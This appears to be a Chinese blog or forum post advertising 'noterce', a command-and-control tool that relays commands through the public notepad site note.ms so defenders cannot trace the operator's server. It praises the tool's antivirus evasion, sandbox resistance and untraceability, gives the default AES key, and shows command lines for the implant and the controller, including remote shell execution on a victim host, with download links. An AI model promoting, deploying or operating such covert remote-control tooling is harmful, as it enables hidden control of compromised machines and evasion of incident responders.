防溯源！无VPS也可用的C2小工具

tna

项目地址


https://github.com/xiao-zhu-zhu/noterce


noterce介绍


   该工具利用公开笔记本网站作为信息传递的中间服务器，能够让蓝队无法追溯到VPS的位置。


   该工具未进行免杀处理，也未执行shellcode，仅仅使用了go的os/exec包进行命令执行，并对其采用AES加密。


   工具能够有效避免被大多数安全设备及态势感知系统发现，同时在多个杀毒软件中免杀。


   在红队攻防活动中，作者针对需要隐藏C2回连地址及流量的需求，创造了该工具。


优点:


   具有免杀功能


   可有效防止被溯源


   实现了AES加密来保证信息的安全


   对隐藏位置进行了深度优化


   能够抵抗沙箱检测


缺点:


   返回命令结果的速度较慢


   功能较少（但敏感功能较少也降低了被检测的风险）
   
   被控端微步在线扫描截图









工具原理


1. 使用公开笔记网站https://note.ms做中间服务器。uri /ba为一个笔记的地址，每个uri都对应一个笔记。





2. 通过笔记本的读写来实现作为被控端和控制端之间的流量传递载体，具体的流程如下图所示：





工具利用


被控端 server


被控端运行以下命令：‍

1. ./server --key notekey --admin ocis

复制代码

其中有两个参数，为了提高安全性，建议都修改一下：

1. <p>key：为AES加密的密钥，可自定义密钥，默认密钥为zhu1234554321zhu</p><p>admin：控制的uri地址，默认为ocis</p>

复制代码

控制端 client

1. 控制端刷新在线主机列表

1. username$ ./client
   
2. 
   
3. 0:主机名:[penetration]  note地址:[BpLnfgDsc3WD9F3qNfHK6a95jjJkwz]       notekey地址:[zhu1234554321zhu]
   
4. 
   
5. 
   
6. 
   
7. 1.获取在线主机列表(不一定全)
   
8. 
   
9. 2.执行主机命令(需要等待30秒)
   
10. 
    
11. 3.更新别控端列表(需等待30秒)

复制代码

2. 控制端执行命令

1. <p>username$ ./client</p><p>1.获取在线主机列表(不一定全)</p><p>2.执行主机命令(需要等待30秒)</p><p>3.更新别控端列表(需等待30秒)</p><p>
   
2. </p><p>2</p><p>请输入note地址:BpLnfgDsc3WD9F3qNfHK6a95jjJkwz</p><p>请输入notekey:BpLnfgDsc3WD9F3qNfHK6a95jjJkwz</p><p>请输入shell命令:whoami</p><p>请等待30秒</p><p>jpass</p>

复制代码

工具下载地址：


网盘链接：https://pan.quark.cn/s/ba73cec0ef82